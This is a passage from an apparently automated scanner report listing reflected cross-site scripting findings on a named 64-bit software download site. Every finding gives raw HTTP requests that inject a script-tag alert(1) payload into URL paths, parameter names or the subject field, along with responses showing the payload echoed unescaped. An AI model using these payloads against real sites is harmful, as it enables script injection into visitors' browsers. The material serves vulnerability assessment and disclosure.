GET /categories/free-64-bit-web-development-downloads-14-0-d.htmlbca45"><script>alert(1)</script>88a1d2dd8e0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-web-development-downloads-14-0-d.htmlbca45"><script>alert(1)</script>88a1d2dd8e0" />
...[SNIP]...

4.1706. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80afd"><script>alert(1)</script>c425ef0f66e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-web-development-downloads-14-0-d.html?80afd"><script>alert(1)</script>c425ef0f66e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:14 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-web-development-downloads-14-0-d.html?80afd"><script>alert(1)</script>c425ef0f66e=1" />
...[SNIP]...

4.1707. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218d1"><script>alert(1)</script>4fe331af1de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories218d1"><script>alert(1)</script>4fe331af1de/free-64-bit-widgets-downloads-304-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:38:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories218d1"><script>alert(1)</script>4fe331af1de/free-64-bit-widgets-downloads-304-0-d.html" />
...[SNIP]...

4.1708. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba48e"><script>alert(1)</script>61cde841274 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.htmlba48e"><script>alert(1)</script>61cde841274 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-widgets-downloads-304-0-d.htmlba48e"><script>alert(1)</script>61cde841274" />
...[SNIP]...

4.1709. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6112f"><script>alert(1)</script>21955c1c69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.html?6112f"><script>alert(1)</script>21955c1c69b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-widgets-downloads-304-0-d.html?6112f"><script>alert(1)</script>21955c1c69b=1" />
...[SNIP]...

4.1710. http://www.x64bitdownload.com/contact.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27828"><script>alert(1)</script>f86c420dbde was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html27828"><script>alert(1)</script>f86c420dbde HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/contact.html27828"><script>alert(1)</script>f86c420dbde" />
...[SNIP]...

4.1711. http://www.x64bitdownload.com/contact.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa263"><script>alert(1)</script>331e6222b82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html?aa263"><script>alert(1)</script>331e6222b82=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/contact.html?aa263"><script>alert(1)</script>331e6222b82=1" />
...[SNIP]...

4.1712. http://www.x64bitdownload.com/contact.html [subject parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1b9"><script>alert(1)</script>4fd62328ec8 was submitted in the subject parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html?subject=Advertising+inquirybe1b9"><script>alert(1)</script>4fd62328ec8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/contact.html?subject=Advertising+inquirybe1b9"><script>alert(1)</script>4fd62328ec8" />
...[SNIP]...

4.1713. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b3ae"><script>alert(1)</script>c6880b6a8ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download9b3ae"><script>alert(1)</script>c6880b6a8ca/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:46:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/download9b3ae"><script>alert(1)</script>c6880b6a8ca/t-64-bit-ozum-download-lhtivuds.html" />
...[SNIP]...

4.1714. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60197"><script>alert(1)</script>0962c697c9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download/t-64-bit-ozum-download-lhtivuds.html60197"><script>alert(1)</script>0962c697c9d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:41 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 24926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/download/t-64-bit-ozum-download-lhtivuds.html60197"><script>alert(1)</script>0962c697c9d" />
...[SNIP]...

4.1715. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 609f9"><script>alert(1)</script>bd02fd97db3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download/t-64-bit-ozum-download-lhtivuds.html?609f9"><script>alert(1)</script>bd02fd97db3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:14 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 24929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/download/t-64-bit-ozum-download-lhtivuds.html?609f9"><script>alert(1)</script>bd02fd97db3=1" />
...[SNIP]...

4.1716. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be9bd"><script>alert(1)</script>d2897fb4cc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsbe9bd"><script>alert(1)</script>d2897fb4cc0/t-64-bit-communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsbe9bd"><script>alert(1)</script>d2897fb4cc0/t-64-bit-communitymate-download-qeakzpwv.html" />
...[SNIP]...

4.1717. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a075"><script>alert(1)</script>b0edf73ede1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html1a075"><script>alert(1)</script>b0edf73ede1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-communitymate-download-qeakzpwv.html1a075"><script>alert(1)</script>b0edf73ede1"/>
...[SNIP]...

4.1718. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 528e0"><script>alert(1)</script>cb345b92cc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html?528e0"><script>alert(1)</script>cb345b92cc2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-communitymate-download-qeakzpwv.html?528e0"><script>alert(1)</script>cb345b92cc2=1"/>
...[SNIP]...

4.1719. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5108"><script>alert(1)</script>438beac92ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadse5108"><script>alert(1)</script>438beac92ff/t-64-bit-cyberlink-youcam-download-gspvirzx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadse5108"><script>alert(1)</script>438beac92ff/t-64-bit-cyberlink-youcam-download-gspvirzx.html" />
...[SNIP]...

4.1720. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14f07"><script>alert(1)</script>b0b929cccfa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html14f07"><script>alert(1)</script>b0b929cccfa HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html14f07"><script>alert(1)</script>b0b929cccfa"/>
...[SNIP]...

4.1721. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2918"><script>alert(1)</script>0c97ca17470 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html?b2918"><script>alert(1)</script>0c97ca17470=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html?b2918"><script>alert(1)</script>0c97ca17470=1"/>
...[SNIP]...

4.1722. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12bf9"><script>alert(1)</script>6fe8131d792 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads12bf9"><script>alert(1)</script>6fe8131d792/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21352

